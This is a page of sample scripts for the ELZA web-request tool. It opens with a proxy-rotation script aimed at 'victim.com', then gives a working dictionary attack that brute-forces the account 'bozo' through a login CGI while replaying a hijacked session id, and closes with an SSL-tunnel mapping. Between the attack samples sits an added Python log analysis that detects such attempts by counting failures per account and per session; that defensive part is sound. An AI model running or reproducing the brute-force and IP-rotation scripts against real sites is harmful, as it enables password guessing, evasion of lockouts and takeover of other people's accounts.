These are some code samples that one may find useful:

1. PROXY ROTATION

	# First, push values into PROXY and PORT. Each time we use one of
	# those substs, the next available value is substituted.

	subst PROXY @ proxy.domain1.com proxy.domain2.com proxy.domain3.com
	subst PORT @ 3128 8080 80

	# The BEFOREREQUEST proc is automatically executed before making
	# a request to the remote server. This allows us to set a proxy server.
	
	proc BEFOREREQUEST

		# Push the next available values from PROXY and PORT into
		# the respective system variables
		var proxy = PROXY
		var port = PORT

	endproc BEFOREREQUEST

	# And now we do the requests we want to do. Each of them is piped
	# through a different proxy server.

	get url http://www.victim.com/page1.html
	get url http://www.victim.com/page2.html
	get url http://www.victim.com/page3.html
	get url http://www.victim.com/page4.html
	get url http://www.victim.com/page5.html

In this example, page1.html is requested through proxy.domain1.com on port
3128, page2.html through proxy.domain2.com:8080, and page3.html through
proxy.domain3.com:80. page4.html is requested again through the first
proxy, page5.html through the second, and so on. Cool, isn't it?

2. DICTIONARY ATTACK

This script serves as an example of how one can write a dictionary attack
using ELZA. I guess many web site administrators are not THAT stupid after
all. If they lock out an account after several wrong passwords, you can do
nothing.

	# First, we define the static things

	subst ACCOUNT = bozo

	# We request the actual login form so that we can examine it
	
	get url http://www.victim.com/loginform.html

	# Then, we grab the very important session_id hidden form field,
	# so that we pass it along with each of our login attempts.

	field session_id $

	# Then, we save the form field value we just grabbed into a subst
	# so that we can use it in the future.

	subst SID f= session_id
	
	# Next, we define a procedure to be executed if our attack is
	# successful.

	proc SUCCESS

		print WOW! Login: ACCOUNT, Password: CURRPASS

	endproc SUCCESS

	# Then, we define the procedure that tries to break in

	proc TRYPASSWORD
	
		# All necessary fields should be set before the request,
		# because they are cleared after each request.

		field username = ACCOUNT
		field password = CURRPASS

		# We set the session_id form field value we hijacked from the
		# legitimate login form.

		field session_id = SID

		# And we do a POST to the login script

		post url http://www.victim.com/cgi-bin/login.cgi

		# Next, we check if we were successful and if we are,
		# we call the SUCCESS procedure.

		call SUCCESS if body != Login failed!

	endproc TRYPASSWORD

	# And finally, we define the main loop that is to execute the
	# TRYPASSWORD for each password from our dictionary file (dict.txt)

	call TRYPASSWORD CURRPASS % dict.txt
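The two samples above make a point worth seeing from the other side of the
connection: sample 1 changes the source address on every request, so a
server-side counter keyed on client IP never reaches its threshold, while
sample 2 sends the same hijacked session_id and the same account name with
every attempt, which is exactly what the lockout mentioned above keys on.
The following is an added example, not part of the original ELZA samples:
a small Python log analysis that counts failures per account, per source
IP and per session id, over a constructed log format (timestamp, source IP,
account, session id, result). The log lines, the field layout, the
thresholds and the function names are all assumptions made for this
example.

```python
"""Login-log analysis keyed on account and session rather than source IP.

Added example, not from the original page: the log format below is
constructed for illustration, and the thresholds are arbitrary choices.
"""
from collections import defaultdict

# Constructed sample log: one account ("bozo") receives six failed logins,
# each from a different source IP but carrying the same session id, as a
# client rotating through three proxies would produce. A second account
# ("alice") logs in normally from a single address.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.1 bozo sid=abc123 login=FAIL
2024-01-01T10:00:02 10.0.0.2 bozo sid=abc123 login=FAIL
2024-01-01T10:00:03 10.0.0.3 bozo sid=abc123 login=FAIL
2024-01-01T10:00:04 10.0.0.1 bozo sid=abc123 login=FAIL
2024-01-01T10:00:05 10.0.0.2 bozo sid=abc123 login=FAIL
2024-01-01T10:00:06 10.0.0.3 bozo sid=abc123 login=FAIL
2024-01-01T10:00:07 192.0.2.7 alice sid=def456 login=OK
2024-01-01T10:00:08 192.0.2.7 alice sid=def456 login=OK
"""

FAIL_THRESHOLD = 5        # failed attempts before an account is locked / IP is blocked
IP_SPREAD_THRESHOLD = 3   # distinct source IPs reusing one session id


def parse_line(line):
    """Split one constructed log line into its fields."""
    ts, ip, account, sid_field, result_field = line.split()
    return {
        "ts": ts,
        "ip": ip,
        "account": account,
        "sid": sid_field.split("=", 1)[1],
        "ok": result_field.split("=", 1)[1] == "OK",
    }


def analyze(log_text, fail_threshold=FAIL_THRESHOLD,
            ip_spread_threshold=IP_SPREAD_THRESHOLD):
    """Return which accounts to lock, which IPs to block and which session
    ids look shared across many addresses.

    The per-IP counter is kept deliberately so the result shows that it
    stays below threshold when the source address rotates, while the
    per-account counter does not.
    """
    fails_per_account = defaultdict(int)
    fails_per_ip = defaultdict(int)
    ips_per_session = defaultdict(set)

    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        ips_per_session[rec["sid"]].add(rec["ip"])
        if not rec["ok"]:
            fails_per_account[rec["account"]] += 1
            fails_per_ip[rec["ip"]] += 1

    return {
        "lock_accounts": sorted(
            a for a, n in fails_per_account.items() if n >= fail_threshold),
        "block_ips": sorted(
            ip for ip, n in fails_per_ip.items() if n >= fail_threshold),
        "suspicious_sessions": sorted(
            s for s, ips in ips_per_session.items()
            if len(ips) >= ip_spread_threshold),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Run as a script, the per-IP list comes back empty (each address only
failed twice), while the per-account list contains "bozo" and the session
list contains "abc123": a lockout keyed on the account, or an alert on a
session id that appears from several addresses, catches what a per-IP
limit alone misses.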

3. AVOIDING SPAWNING THE SSL TUNNEL REPEATEDLY

This should work as follows:

	1. Spawn the tunnel before running the ELZA Script.

	2. In the ELZA script, add a hostmap for the host you want to
	connect to:

		# Tell ELZA not to spawn tunnel when encountering https://

		var honorhttps = no
	
		# Tell ELZA to pipe all requests to secure-server.victim.com
		# on port 443 to localhost, port 24242

		hostmap secure-server.victim.com 443 localhost 24242

That is all for now. If you have a piece of code you would like to be
included, please pass it on to philip_stoev@iname.com.